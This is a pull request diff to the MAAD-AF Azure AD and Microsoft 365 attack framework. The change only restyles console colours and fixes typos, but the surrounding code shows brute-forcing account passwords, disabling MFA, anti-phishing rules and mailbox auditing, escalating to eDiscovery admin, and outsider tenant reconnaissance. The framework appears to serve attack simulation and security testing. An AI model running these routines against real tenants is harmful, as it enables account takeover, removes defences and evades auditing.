### PR TITLE
Modular color definitions, minor spelling corrections.

### DIFF
--- a/Library/AutomatedContentSearch.ps1
+++ b/Library/AutomatedContentSearch.ps1
@@ -83,7 +83,7 @@ function AutomatedContentSearch {
             $Comp_Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://ps.compliance.protection.outlook.com/powershell-liveid -Credential $global:AdminCredential -Authentication Basic -AllowRedirection 
             Import-PSSession $Comp_Session -AllowClobber
 
-            Write-Host "`nAttempting to escalate privileges to eDiscovery Manager role ..." -ForegroundColor Gray
+            Write-Host "`nAttempting to escalate privileges to eDiscovery Manager role ..." @fg_gray
             Add-RoleGroupMember -Identity "eDiscovery Manager" -Member $global:AdminUsername -ErrorAction Stop
             #Add-eDiscoveryCaseAdmin -User $global:AdminUsername
             Write-Host "`nSuccessfully elevated privileges to eDiscovery Manager role!"
@@ -117,7 +117,7 @@ function AutomatedContentSearch {
             $complianceSearch = Get-ComplianceSearch -Identity $search_name
         }
     while ($complianceSearch.Status -ne 'Completed')
-    Write-Host "Compliance Search completed!!!" -ForegroundColor Yellow -BackgroundColor Black
+    Write-Host "Compliance Search completed!!!" @fg_yellow @bg_black
     
     Get-ComplianceSearch -Identity $search_name | fl
  
@@ -148,7 +148,7 @@ function AutomatedContentSearch {
             }
         while ($complete.Status -ne 'Completed')
         
-        Write-Host "`nExport completed" -ForegroundColor Yellow -BackgroundColor Black
+        Write-Host "`nExport completed" @fg_yellow @bg_black
         
         $export_details = Get-ComplianceSearchAction -Case $case_name -Identity $export_name -IncludeCredential -Details
         
@@ -181,7 +181,7 @@ function AutomatedContentSearch {
                     #Deleting case
                     Write-Host "Deleting case"
                     Remove-ComplianceCase -Identity $case_name -Confirm:$false
-                    Write-Host "`Undo successful: Removed E-discovery case: $case_name`n" -ForegroundColor Yellow -BackgroundColor Black
+                    Write-Host "`Undo successful: Removed E-discovery case: $case_name`n" @fg_yellow @bg_black
                 }
                 catch {
                     Write-Host "Error: Failed to delete E-discovery case $case_name!`n You can try to delete it manually from the Admin console."

--- a/Library/AzureADRecon.ps1
+++ b/Library/AzureADRecon.ps1
@@ -27,7 +27,7 @@ function AzureADRecon {
          #Display options to generate different types of tokens
          $token_types = @("AadGraph", "AnalysisServices", "AppConfiguration", "Arm", "Attestation", "Batch", "DataLake", "KeyVault", "MSGraph", "OperationalInsights", "ResourceManager", "Storage", "Synapse")
          foreach ($item in $token_types){
-            Write-Host $token_types.IndexOf($item) ":" $item -ForegroundColor Gray
+            Write-Host $token_types.IndexOf($item) ":" $item @fg_gray
          }
          [int]$token_type_choice = Read-Host "`nChoose a token type to generate"
          $token_type = $token_types[$token_type_choice]
@@ -38,10 +38,10 @@ function AzureADRecon {
             #Saved token information to tokens file
             "Token type: $token_type" | Out-File -Append -FilePath .\Outputs\Azure_AD_Tokens.txt
             $token | Out-File -Append -FilePath .\Outputs\Azure_AD_Tokens.txt
-            Write-Host "Token saved to Outputs directory" -ForegroundColor Gray
+            Write-Host "Token saved to Outputs directory" @fg_gray
          }
          catch {
-            Write-Host "Failed to generate token!" -ForegroundColor Red
+            Write-Host "Failed to generate token!" @fg_red
          }
       }
 
@@ -78,13 +78,13 @@ function AzureADRecon {
       if ($recon_user_choice -eq 9) {
          #Get a user's registered device
          Get-AzureADMSConditionalAccessPolicy | Format-Table DisplayName, Id, State
-         Write-Host "`nShowing detailed information on each policy below...`n" -ForegroundColor Gray
+         Write-Host "`nShowing detailed information on each policy below...`n" @fg_gray
          Start-Sleep -Seconds 5
 
          $conditional_policy_list = Get-AzureADMSConditionalAccessPolicy
          foreach ($policy in $conditional_policy_list){
                Write-Host "`n###########################################" 
-               Write-Host "Policy Name:" -ForegroundColor Yellow
+               Write-Host "Policy Name:" @fg_yellow
                $policy.DisplayName
                Write-Host "###########################################" 
                Write-Host "`nPolicy state:"

--- a/Library/Basic_Functions.ps1
+++ b/Library/Basic_Functions.ps1
@@ -2,11 +2,11 @@
 function RequiredModules {
     ###This function checks for required modules by MAAD and Installs them if unavailable
     $RequiredModules=@("Az","AzureAd","MSOnline","ExchangeOnlineManagement","MicrosoftTeams","AzureADPreview","AADInternals","Microsoft.Online.SharePoint.PowerShell","PnP.PowerShell")
-    Write-Host "`nMAAD-AF requires the following powershell modules:`n$RequiredModules" -ForegroundColor Gray
+    Write-Host "`nMAAD-AF requires the following powershell modules:`n$RequiredModules" @fg_gray
     $allow = Read-Host -Prompt "`nAutomatically check for dependencies and install missing modules? (Yes / No)"
 
     if ($allow -notin "No","no","N","n") {
-        Write-Host "Checking all required modules..." -ForegroundColor Gray
+        Write-Host "Checking all required modules..." @fg_gray
 
         foreach ($module in $RequiredModules.GetEnumerator()) {
             if (Get-InstalledModule -Name $($module) ) {
@@ -14,11 +14,11 @@ function RequiredModules {
                     Import-Module -Name $($module) -WarningAction SilentlyContinue
                 }
                 catch {
-                    Write-Host "Failed to import. Skippig module: $module. " -ForegroundColor Red
+                    Write-Host "Failed to import. Skipping module: $module. " @fg_red
                 }  
             } 
             else {
-                Write-Host "'$module' module does NOT exist. The tool will attempt to install it now..." -ForegroundColor Gray
+                Write-Host "'$module' module does NOT exist. The tool will attempt to install it now..." @fg_gray
                 try {
                     Set-ExecutionPolicy Unrestricted -Force
                     Set-PSRepository -Name 'PSGallery' -InstallationPolicy Trusted
@@ -26,14 +26,14 @@ function RequiredModules {
                     Import-Module -Name $($module) -WarningAction SilentlyContinue
                 }
                 catch {
-                    Write-Host "Failed to install. Skippig module: $module. " -ForegroundColor Red
+                    Write-Host "Failed to install. Skipping module: $module. " @fg_red
                 }   
             }
         }
-        Write-Host "All required modules available!" -ForegroundColor Gray
+        Write-Host "All required modules available!" @fg_gray
     }
     else {
-        Write-Host "Note: Some functions may fail if required modules are missing" -ForegroundColor Gray
+        Write-Host "Note: Some functions may fail if required modules are missing" @fg_gray
     }  
     #To prevent overwrite from any imported modules 
     $host.UI.RawUI.WindowTitle = "MAAD Attack Framework"
@@ -45,7 +45,7 @@ function ClearActiveSessions {
 
 function terminate_connection {
     try {
-        Write-Host "`nClosing all existing connections........." -ForegroundColor Yellow -BackgroundColor Black
+        Write-Host "`nClosing all existing connections........." @fg_yellow @bg_black
         Disconnect-AzureAD -Confirm:$false | Out-Null
         Disconnect-ExchangeOnline -Confirm:$false | Out-Null
         Disconnect-AzAccount -Confirm:$false | Out-Null
@@ -61,7 +61,7 @@ function terminate_connection {
 
 function OptionDisplay ($menu_message, $option_list_dictionary){
     ###This function diplays a list of options from a dictionary.
-    Write-Host "`n$menu_message" -ForegroundColor Red
+    Write-Host "`n$menu_message" @fg_red
     $option_list_array = $option_list_dictionary.GetEnumerator() |sort Name
 
     foreach ($item in $option_list_array){
@@ -83,12 +83,12 @@ function EnterMailbox ($input_prompt){
 
         if ($global:input_mailbox_address.ToUpper() -eq "RECON" -or $global:input_mailbox_address -eq "" -or $global:input_mailbox_address -eq $null) {
             try {
-                Write-Host "`nExecuting recon to list available mailboxes in the environment" -ForegroundColor Gray
+                Write-Host "`nExecuting recon to list available mailboxes in the environment" @fg_gray
                 Get-Mailbox | Format-Table -Property DisplayName,PrimarySmtpAddress 
                 $repeat = $true
             }
             catch {
-                Write-Host "Failed to find mailboxes" -ForegroundColor Red
+                Write-Host "Failed to find mailboxes" @fg_red
                 $repeat = $false
             }
         }
@@ -113,7 +113,7 @@ function ValidateMailbox ($mailbox_address){
         $global:mailbox_found = $true
     }
     catch {
-        Write-Host "`nThe mailbox does not exist or the account does not have a mailbox setup.`n" -ForegroundColor Red
+        Write-Host "`nThe mailbox does not exist or the account does not have a mailbox setup.`n" @fg_red
         $global:mailbox_found = $false
     }
 }
@@ -126,12 +126,12 @@ function EnterAccount ($input_prompt){
 
         if ($global:input_user_account.ToUpper() -eq "RECON" -or $global:input_user_account -eq "" -or $global:input_user_account -eq $null) {
             try {
-                Write-Host "`nExecuting recon to list available accounts in the tenant" -ForegroundColor Gray
+                Write-Host "`nExecuting recon to list available accounts in the tenant" @fg_gray
                 Get-AzureADUser | Format-Table -Property DisplayName,UserPrincipalName,UserType
                 $repeat = $true
             }
             catch {
-                Write-Host "Failed to find mailboxes" -ForegroundColor Red
+                Write-Host "Failed to find mailboxes" @fg_red
                 $repeat = $false
             }
         }
@@ -154,13 +154,13 @@ function ValidateAccount ($account_username){
     $check_account = Get-AzureADUser -SearchString $account_username
     
     if ($check_account -eq $null){
-        Write-Host "The account does not exist or match an account in the tenant!`n" -ForegroundColor Red
+        Write-Host "The account does not exist or match an account in the tenant!`n" @fg_red
         $global:account_found = $false
     }
     
     else {
         if ($check_account.GetType().BaseType.Name -eq "Array"){
-            Write-Host "Multiple accounts found matching your search. Lets take things slow ;) Be more specific to target one account!" -ForegroundColor Red
+            Write-Host "Multiple accounts found matching your search. Lets take things slow ;) Be more specific to target one account!" @fg_red
             $global:account_found = $false
         }
         else {

--- a/Library/BruteForce.ps1
+++ b/Library/BruteForce.ps1
@@ -6,12 +6,12 @@ function BruteForce ($username){
         #Display available files in MAAD-AF directory
         $file_list = Get-ChildItem -Path ./* -Include *.txt
         if ($null -eq $file_list) {
-            Write-Host "`nNote: No potential dictionary files found. Add a password dictionary text file to '$((Get-Item ./).FullName)'" -ForegroundColor Red
+            Write-Host "`nNote: No potential dictionary files found. Add a password dictionary text file to '$((Get-Item ./).FullName)'" @fg_red
         }
         else {
-            Write-Host "`nPossible dictionary files found in the MAAD-AF directory:" -ForegroundColor Gray
+            Write-Host "`nPossible dictionary files found in the MAAD-AF directory:" @fg_gray
             foreach ($file in $file_list.Name){
-                Write-Host "- $file" -ForegroundColor Gray
+                Write-Host "- $file" @fg_gray
             }
         }
 
@@ -24,7 +24,7 @@ function BruteForce ($username){
             #Check file format - Only txt files accepted
             $extn = [IO.Path]::GetExtension($filename) 
             if ($extn -ne ".txt") {
-                Write-Host "`nInvalid file type: Please provide a 'txt' dictionary file with each password on a new line." -ForegroundColor Red
+                Write-Host "`nInvalid file type: Please provide a 'txt' dictionary file with each password on a new line." @fg_red
                 $check_file = $false
             }
             else {
@@ -32,7 +32,7 @@ function BruteForce ($username){
             } 
         }
         else {
-            Write-Host "`nPassword file: '$filename' not found. Check -`n1.If the spelling is correct`n2.If the file exists in the same directory as the tool`n3.Include extension in filename" -ForegroundColor Red
+            Write-Host "`nPassword file: '$filename' not found. Check -`n1.If the spelling is correct`n2.If the file exists in the same directory as the tool`n3.Include extension in filename" @fg_red
             $check_file = $false
         }
     }
@@ -61,7 +61,7 @@ function BruteForce ($username){
             $userobject | Add-Member -MemberType NoteProperty -Name "UserName" -Value $username
             $userobject | Add-Member -MemberType NoteProperty -Name "Password" -Value $password
             
-            Write-Host "`nSuccess is No Accident ;) Successfully cracked account password!!!" -ForegroundColor Yellow -BackgroundColor Black
+            Write-Host "`nSuccess is No Accident ;) Successfully cracked account password!!!" @fg_yellow @bg_black
             $userobject | Format-Table 
             $userobject | Out-File -FilePath .\Outputs\External_BruteForce_Result.txt
             break
@@ -74,7 +74,7 @@ function BruteForce ($username){
     }
     #Print if brute-force unsuccessful
     if ($userobject -eq $null){
-        Write-Host "`nBrute-force Unsuccessful!!! Try another password dictionary or account!!!" -ForegroundColor Yellow -BackgroundColor Black
+        Write-Host "`nBrute-force Unsuccessful!!! Try another password dictionary or account!!!" @fg_yellow @bg_black
     }
     Pause
 }
@@ -84,7 +84,7 @@ function InternalBruteForce {
     mitre_details("BruteForce")
 
     #Get account to target
-    EnterAccount ("`nEnter an account to brute-force (eg:user@org.com) or enter 'recon' to find all available accounts")
+    EnterAccount ("`nEnter an account to brute-force (eg:user@example.com) or enter 'recon' to find all available accounts")
     $username = $global:input_user_account
 
     BruteForce($username)
@@ -96,7 +96,7 @@ function ExternalBruteForce {
 
     #Get account to target
     do {
-        $username = Read-Host -Prompt "`nEnter an account to brute-force (eg:user@org.com)"
+        $username = Read-Host -Prompt "`nEnter an account to brute-force (eg:user@example.com)"
     } until ("" -ne $username)
 
     BruteForce($username)

--- a/Library/DisableAntiPhishing.ps1
+++ b/Library/DisableAntiPhishing.ps1
@@ -26,7 +26,7 @@ function DisableAntiPhishing {
         Start-Sleep -s 5  
         #Get-AntiPhishPolicy -Identity $policy_name | Format-Table Name,Enabled,IsDefault
         Get-AntiPhishRule -Identity $policy_name | Format-Table Name,State,Priority
-        Write-Host "Guard's down!!! Successfully disabled Anti-Phishing policy!!!" -ForegroundColor Yellow -BackgroundColor Black
+        Write-Host "Guard's down!!! Successfully disabled Anti-Phishing policy!!!" @fg_yellow @bg_black
         $allow_undo = $true
     }
     catch {
@@ -43,10 +43,10 @@ function DisableAntiPhishing {
                 Enable-AntiPhishRule -Identity $policy_name -Confirm:$false
                 Start-Sleep -s 5 
                 Get-AntiPhishRule -Identity $policy_name | Format-Table Name,State,Priority
-                Write-Host "Undo successful: Re-enabled Anti-Phishing policy: '$policy_name'" -ForegroundColor Yellow -BackgroundColor Black
+                Write-Host "Undo successful: Re-enabled Anti-Phishing policy: '$policy_name'" @fg_yellow @bg_black
             }
             catch {
-                Write-Host "Failed to undo changes" -ForegroundColor Red
+                Write-Host "Failed to undo changes" @fg_red
             }
         }
     }

--- a/Library/DisableMFA.ps1
+++ b/Library/DisableMFA.ps1
@@ -2,7 +2,7 @@ function DisableMFA {
 
     mitre_details("DisableMFA")
 
-    EnterAccount ("Enter an account to disable MFA for (user@org.com)")
+    EnterAccount ("Enter an account to disable MFA for (user@example.com)")
     $target_account = $global:input_user_account
 
     #Disabe MFA
@@ -10,7 +10,7 @@ function DisableMFA {
         Write-Host "`nDisabling MFA for the account ..."
         Get-MsolUser -UserPrincipalName $target_account | Set-MsolUser -StrongAuthenticationRequirements @() -ErrorAction Stop
         Start-Sleep -s 5 
-        Write-Host "`nGuards Down!!! MFA successfully disabled for $target_account" -ForegroundColor Yellow -BackgroundColor Black
+        Write-Host "`nGuards Down!!! MFA successfully disabled for $target_account" @fg_yellow @bg_black
         $allow_undo = $true
     }
     catch {
@@ -30,7 +30,7 @@ function DisableMFA {
             $mfax = @($mfa)
             try {
                 Set-MsolUser -UserPrincipalName $target_account -StrongAuthenticationRequirements $mfax
-                Write-Host "Undo successful: Re-enabled MFA for account $target_account!" -ForegroundColor Yellow -BackgroundColor Black
+                Write-Host "Undo successful: Re-enabled MFA for account $target_account!" @fg_yellow @bg_black
             }
             catch {
                 Write-Host "Error: Failed to enable MFA for the account $target_account. Try enabling through Admin console."

--- a/Library/DisableMailboxAuditing.ps1
+++ b/Library/DisableMailboxAuditing.ps1
@@ -23,11 +23,11 @@ function DisableMailboxAuditing{
             Set-MailboxAuditBypassAssociation -Identity $InternalUserName -AuditByPassEnabled $true -ErrorAction Stop
             Start-Sleep -s 60
             Get-MailboxAuditBypassAssociation -Identity $InternalUserName | Format-Table AuditBypassEnabled
-            Write-Host "Let's fly low! Successfully disabled auditing!!!" -ForegroundColor Yellow -BackgroundColor Black
+            Write-Host "Let's fly low! Successfully disabled auditing!!!" @fg_yellow @bg_black
             $allow_undo = $true
         }
         catch {
-            Write-Host "Error: Failed to disable auditing on mailbox $InternalUserName!!!" -ForegroundColor Yellow -BackgroundColor Black
+            Write-Host "Error: Failed to disable auditing on mailbox $InternalUserName!!!" @fg_yellow @bg_black
         }      
     }
 
@@ -41,7 +41,7 @@ function DisableMailboxAuditing{
             Set-MailboxAuditBypassAssociation -Identity $InternalUserName -AuditByPassEnabled $false
             Start-Sleep -s 60    
             Get-MailboxAuditBypassAssociation -Identity $InternalUserName | Format-Table AuditBypassEnabled 
-            Write-Host "Undo successful: Re-enabled auditing!!!" -ForegroundColor Yellow -BackgroundColor Black
+            Write-Host "Undo successful: Re-enabled auditing!!!" @fg_yellow @bg_black
         }
     }
     Pause

--- a/Library/E_Discovery_Module.ps1
+++ b/Library/E_Discovery_Module.ps1
@@ -11,7 +11,7 @@ function eDiscovery {
         Start-Sleep -Seconds 5
     }
     catch {
-        Write-Host "Failed to establish session with compliance portal with the current credentials!" -ForegroundColor Red
+        Write-Host "Failed to establish session with compliance portal with the current credentials!" @fg_red
         return
     }
     
@@ -21,7 +21,7 @@ function eDiscovery {
 
     #Check eDiscovery Admin 
     if ((Get-AzureADUser -ObjectId $global:AdminUsername).DisplayName -notin $admin_role_members.Name){
-        Write-Host "`nNote: You are currently not eDiscovery Admin which may prevent you from executing certain operations. Start by attempting privilege escalation using eDiscovery sub-module [8]' ;)" -ForegroundColor Gray
+        Write-Host "`nNote: You are currently not eDiscovery Admin which may prevent you from executing certain operations. Start by attempting privilege escalation using eDiscovery sub-module [8]' ;)" @fg_gray
     }
 
     $e_discovery_options = @{0 = "Back"; 1 = "Quick Grab And Run"; 2 = "Create a new eDiscovery Search"; 3 = "Recon Existing eDiscovery Cases"; 4 = "Find eDiscovery Case Members"; 5 = "Recon Existing eDiscovery Searches"; 6 = "Find Details of a Search"; 7 = "Export and Download a Search"; 8 = "Escalate eDiscovery Privileges"; 9 = "Install Unified Export Tool"};
@@ -118,7 +118,7 @@ function eDiscovery {
                         break
                     }
                     catch {
-                        Write-Host "Error: Could not export the search. The search results might be too old and need to be re-ran." -ForegroundColor Red
+                        Write-Host "Error: Could not export the search. The search results might be too old and need to be re-ran." @fg_red
                         Write-Host "`nMAAD-AF attempting to re-run the selected search..."
                         Start-ComplianceSearch -Identity $global:selected_search
                         do
@@ -127,7 +127,7 @@ function eDiscovery {
                                 $complianceSearch = Get-ComplianceSearch -Identity $global:selected_search
                             }
                         while ($complianceSearch.Status -ne 'Completed')
-                        Write-Host "Successfully completed re-run of the selected compliance search!!!" -ForegroundColor Yellow -BackgroundColor Black  
+                        Write-Host "Successfully completed re-run of the selected compliance search!!!" @fg_yellow @bg_black  
                     }
                 
                     try {
@@ -144,7 +144,7 @@ function eDiscovery {
                     }
                     catch {
                         Write-Host "Error: Could not export search again."
-                        Write-Host "Tip: Try with another case/search." -ForegroundColor Gray
+                        Write-Host "Tip: Try with another case/search." @fg_gray
                     }
                 }
                 else {
@@ -179,7 +179,7 @@ function Display_E_Discovery_Cases ($selection = $false) {
         return
     }
 
-    Write-Host "eDiscovery cases in the environment" -ForegroundColor Gray
+    Write-Host "eDiscovery cases in the environment" @fg_gray
     foreach ($item in $all_e_discovery_cases){
         Write-Host $([array]::IndexOf($all_e_discovery_cases,$item)+1) ':' $item.Name
     } 
@@ -203,7 +203,7 @@ function Display_E_Discovery_Case_Searches ($selection = $false, $case_name) {
     $all_case_searches = Get-ComplianceSearch -Case $case_name
     Write-Host ""
 
-    Write-Host "Here are the available searches in the case: $case_name" -ForegroundColor Gray
+    Write-Host "Here are the available searches in the case: $case_name" @fg_gray
     if ($all_case_searches -is [array]) {
         foreach ($item in $all_case_searches){
             Write-Host $([array]::IndexOf($all_case_searches,$item)+1) ':' $item.Name
@@ -266,10 +266,10 @@ function E_Discovery_Priv_Esc {
         if ((Get-AzureADUser -ObjectId $global:AdminUsername).DisplayName -notin $role_members.Name){ 
             #Escalate to Manager
             try {
-                Write-Host "`nAttempting to escalate privileges to eDiscovery Manager role ..." -ForegroundColor Gray
+                Write-Host "`nAttempting to escalate privileges to eDiscovery Manager role ..." @fg_gray
                 Add-RoleGroupMember -Identity "eDiscovery Manager" -Member $global:AdminUsername -ErrorAction Stop
                 Write-Host "`nSuccessfully elevated privileges to eDiscovery Manager role!"
-                Write-Host "Waiting for changes to take effect..." -ForegroundColor Gray
+                Write-Host "Waiting for changes to take effect..." @fg_gray
                 Start-Sleep -Seconds 30
             }
             catch {
@@ -280,14 +280,14 @@ function E_Discovery_Priv_Esc {
         
         ###Escalate to eDiscovery Admin
         try {
-            Write-Host "`nNow attempting to escalate privileges to eDiscovery Administrator..." -ForegroundColor Gray
+            Write-Host "`nNow attempting to escalate privileges to eDiscovery Administrator..." @fg_gray
             Add-eDiscoveryCaseAdmin -User $global:AdminUsername
-            Write-Host "Waiting for changes to take effect..." -ForegroundColor Gray
+            Write-Host "Waiting for changes to take effect..." @fg_gray
             Start-Sleep -Seconds 30
-            Write-Host "`nYou are now eDiscovery Admin!!!" -ForegroundColor Yellow
+            Write-Host "`nYou are now eDiscovery Admin!!!" @fg_yellow
         }
         catch {
-            Write-Host "Failed to escalate privileges to eDiscovery Admin!" -ForegroundColor Red
+            Write-Host "Failed to escalate privileges to eDiscovery Admin!" @fg_red
             break
         }
 
@@ -298,12 +298,12 @@ function E_Discovery_Priv_Esc {
             Start-Sleep -Seconds 5
         }
         catch {
-            Write-Host "Error: Failed to establish new session!" -ForegroundColor Red
+            Write-Host "Error: Failed to establish new session!" @fg_red
         }
         }
     else {
         Write-Host "`nSometimes life is not that hard ;)"
-        Write-Host "You are already eDiscovery Admin & Manager!!!" -ForegroundColor Yellow
+        Write-Host "You are already eDiscovery Admin & Manager!!!" @fg_yellow
         return
     }
 }
@@ -344,7 +344,7 @@ function Create_New_Search {
         Start-ComplianceSearch -Identity $search_name -ErrorAction Stop
     }
     catch {
-        Write-Host "Failed to start compliance search!" -ForegroundColor Red
+        Write-Host "Failed to start compliance search!" @fg_red
         break
     }
     
@@ -354,7 +354,7 @@ function Create_New_Search {
             $complianceSearch = Get-ComplianceSearch -Identity $search_name
         }
     while ($complianceSearch.Status -ne 'Completed')
-    Write-Host "Compliance Search completed!!!" -ForegroundColor Yellow -BackgroundColor Black
+    Write-Host "Compliance Search completed!!!" @fg_yellow @bg_black
 
     Read-Host -Prompt "Press enter to see details of the compliance search:"
     Get-ComplianceSearch -Identity $search_name | fl
@@ -411,5 +411,5 @@ function Install_Unified_Export_Tool {
             Get-EventSubscriber|? {$_.SourceObject.ToString() -eq 'System.Deployment.Application.InPlaceHostingManager'} | Unregister-Event
         }
     }
-    Write-Host "Unified Export tool already installed. You are all set here!" -BackgroundColor Black -ForegroundColor Yellow
+    Write-Host "Unified Export tool already installed. You are all set here!" @bg_black @fg_yellow
 }

--- a/Library/ExternalRecon.ps1
+++ b/Library/ExternalRecon.ps1
@@ -1,5 +1,5 @@
 function ExternalRecon {
-    Write-Host "`nExternal Recon allows you to gather intelligence on your target user/organization to leverage in further attacks" -BackgroundColor Black -ForegroundColor Yellow
+    Write-Host "`nExternal Recon allows you to gather intelligence on your target user/organization to leverage in further attacks" @bg_black @fg_yellow
     
     $recon_user_name = Read-Host -Prompt "`nEnter a username from an organization you want to target & recon (the tool will extract the domain from it)"
 
@@ -7,11 +7,11 @@ function ExternalRecon {
         $recon_domain = $recon_user_name.Split("@")[1]
     }
 
-    Write-Host "`nThe tool will now perform several recon operations and gather open source intelligence on the user and organization's Azure environment. `n" -ForegroundColor Yellow
+    Write-Host "`nThe tool will now perform several recon operations and gather open source intelligence on the user and organization's Azure environment. `n" @fg_yellow
     $null = Read-Host -Prompt "`nPress 'Enter' to continue" 
 
     #Check if a user account exists in the organization
-    Write-Host "`nChecking if the user account exists in the Azure environment ...`n" -ForegroundColor Yellow 
+    Write-Host "`nChecking if the user account exists in the Azure environment ...`n" @fg_yellow 
     if (Invoke-AADIntUserEnumerationAsOutsider -UserName $recon_user_name){
         Write-Host "`nResult: Account found!!! User account is a valid account in the organization!`n"
     }
@@ -23,28 +23,28 @@ function ExternalRecon {
     Pause
 
     #Get users login information
-    Write-Host "`nGathering login information of the user ...`n" -ForegroundColor Yellow 
+    Write-Host "`nGathering login information of the user ...`n" @fg_yellow 
     Get-AADIntLoginInformation -UserName $recon_user_name | Format-Table
     Pause
 
     #List other domains of the organization
-    Write-Host "`nFinding all other domains of the organization ...`n" -ForegroundColor Yellow 
+    Write-Host "`nFinding all other domains of the organization ...`n" @fg_yellow 
     Get-AADIntTenantDomains -Domain $recon_domain | Format-Table
     Write-Host "`n"
     Pause
 
     #Gather all information on a domain
-    Write-Host "`nGathering all information on the organization domain ...`n" -ForegroundColor Yellow 
+    Write-Host "`nGathering all information on the organization domain ...`n" @fg_yellow 
     Invoke-AADIntReconAsOutsider -DomainName $recon_domain | Format-Table
     Pause
 
     #Get tenant ID
-    #Write-Host "`nFinding tenant ID of the domain ...`n" -ForegroundColor Yellow 
+    #Write-Host "`nFinding tenant ID of the domain ...`n" @fg_yellow 
     #Get-AADIntTenantID -Domain $recon_domain
     #Pause
 
     #Get DNS information
-    Write-Host "`nGathering all DNS information on the organization domain ...`n" -ForegroundColor Yellow 
+    Write-Host "`nGathering all DNS information on the organization domain ...`n" @fg_yellow 
     Resolve-DnsName -Name $recon_domain -Type MX | Format-Table
     Resolve-DnsName -Name $recon_domain -Type TXT | Format-Table
     Pause

--- a/Library/ExternalTeamsAccess.ps1
+++ b/Library/ExternalTeamsAccess.ps1
@@ -8,7 +8,7 @@ function ExternalTeamsAccess {
         if ($module_choice -eq 1) {
             $user_choice = Read-Host -Prompt "Would you like to initiate recon to find available teams? (yes/no)"
             if ($user_choice -notin "No","no","N","n") {
-                Write-Host "`nRecon: Searching information on available teams in the environment ..." -ForegroundColor Yellow
+                Write-Host "`nRecon: Searching information on available teams in the environment ..." @fg_yellow
                 Get-Team | Format-Table DisplayName,GroupID,Description,Visibility    
             }
             
@@ -68,7 +68,7 @@ function ExternalTeamsAccess {
     while ($timer -le $time_limit_sec){
         try{
             Add-TeamUser -GroupId $group_id -Role Member -User $external_email_address -ErrorAction Stop
-            Write-Host "Successfully added new account: $external_email_address to teams group: $display_name" -ForegroundColor Yellow -BackgroundColor Black
+            Write-Host "Successfully added new account: $external_email_address to teams group: $display_name" @fg_yellow @bg_black
             $allow_undo = $true
             break
         }

--- a/Library/GrantMailboxAccess.ps1
+++ b/Library/GrantMailboxAccess.ps1
@@ -15,11 +15,11 @@ function GrantMailboxAccess{
     try {
         Add-MailboxPermission -Identity $target_mailbox -user $recipient_mailbox -AccessRights FullAccess
         Write-Host "`nPermission grant succesful!"
-        Write-Host "$recipient_mailbox has full access rights to $target_mailbox mailbox" -ForegroundColor Yellow -BackgroundColor Black
+        Write-Host "$recipient_mailbox has full access rights to $target_mailbox mailbox" @fg_yellow @bg_black
         $allow_undo = $true
     }
     catch {
-        Write-Host "Failed to add mailbox permission" -ForegroundColor Red
+        Write-Host "Failed to add mailbox permission" @fg_red
     }
 
     if ($allow_undo -eq $true) {
@@ -28,7 +28,7 @@ function GrantMailboxAccess{
         if ($user_confirm -notin "No","no","N","n") {
             Write-Host "Removing mailbox access to: $target_mailbox ...`n"
             Remove-MailboxPermission -Identity $target_mailbox -User $recipient_mailbox -AccessRights FullAccess
-            Write-Host "`nUndo successful: Removed mailbox access grant to $target_mailbox mailbox!!!" -ForegroundColor Yellow -BackgroundColor Black
+            Write-Host "`nUndo successful: Removed mailbox access grant to $target_mailbox mailbox!!!" @fg_yellow @bg_black
         }
     }
     Pause

--- a/Library/Initial_Access.ps1
+++ b/Library/Initial_Access.ps1
@@ -4,9 +4,9 @@ function establish_connection {
     Write-Host ""
     #Checking if saved credentials are available in MAAD_Config.ps1
     if ($global:CredentialsList.Count -gt 0) {
-        Write-Host "Credentials available:" -ForegroundColor Gray
+        Write-Host "Credentials available:" @fg_gray
         foreach ($item in $global:CredentialsList){
-            Write-Host $global:CredentialsList.IndexOf($item) ":" $item["username"] -ForegroundColor Gray
+            Write-Host $global:CredentialsList.IndexOf($item) ":" $item["username"] @fg_gray
         }
         $credential_choice = Read-Host "`nChoose a credential from the list or enter 'x' to enter new credentials manually"
 
@@ -26,11 +26,11 @@ function establish_connection {
 
     #Get credentials if not found in config file
     if ($global:AdminUsername -in $null,"" -or $global:AdminPassword -in "",$null) {
-        Write-Host "`nEnter admin credentials to access Azure AD & M365 environment" -ForegroundColor Red
+        Write-Host "`nEnter admin credentials to access Azure AD & M365 environment" @fg_red
         $global:AdminUsername = Read-Host -Prompt "Enter admin username:"
         $global:AdminSecurePass = Read-Host -Prompt "Enter $global:AdminUsername password:" -AsSecureString 
         $global:AdminCredential = New-Object System.Management.Automation.PSCredential -ArgumentList ($global:AdminUsername, $global:AdminSecurePass)
-        Write-Host "`nTip: You can also store credentials in MAAD_Config.ps1 if you would like to." -ForegroundColor Gray
+        Write-Host "`nTip: You can also store credentials in MAAD_Config.ps1 if you would like to." @fg_gray
     }
     else {
         Write-Host "Retrieved credentials...`n"
@@ -39,7 +39,7 @@ function establish_connection {
     }
 
     #Create Sessions
-    Write-Host "`nHold tight!!! Establishing access to Azure AD and M365 services..." -ForegroundColor Yellow -BackgroundColor Black
+    Write-Host "`nHold tight!!! Establishing access to Azure AD and M365 services..." @fg_yellow @bg_black
     AccessAzureAD $global:AdminUsername $global:AdminCredential $global:AccessToken
     AccessAzAccount $global:AdminUsername $global:AdminCredential $global:AccessToken
     AccessTeams $global:AdminUsername $global:AdminCredential $global:AccessToken
@@ -60,34 +60,34 @@ function AccessAzureAD{
         try {
         #Attempt token authentication  
         Connect-AzureAD -AadAccessToken $AccessToken -AccountId $AdminUsername -ErrorAction Stop | Out-Null
-        Write-Host "[.]Established access to AzureAD`n" -ForegroundColor Yellow
+        Write-Host "[.]Established access to AzureAD`n" @fg_yellow
         }
         catch {
             Write-Host "Token authentication failed. Attempting basic authentication now..."
             try {
                 #Attempt basic authentication
                 Connect-AzureAD -Credential $AdminCredential -WarningAction SilentlyContinue -ErrorAction Stop| Out-Null 
-                Write-Host "[.]Established access to AzureAD`n" -ForegroundColor Yellow
+                Write-Host "[.]Established access to AzureAD`n" @fg_yellow
             }
             catch [Microsoft.Open.Azure.AD.CommonLibrary.AadAuthenticationFailedException]{
                 #Check if account has MFA requirements for authentication
                 if ($null -ne (Select-String -Pattern "multi-factor authentication" -InputObject $_.Exception.Message)) {
-                    Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." -ForegroundColor Gray
+                    Write-Host "Account requires interactive MFA for authentication.`nLaunching interactive authentication window to continue..." @fg_gray
                     try {
                         #Attempt interactive authentication  
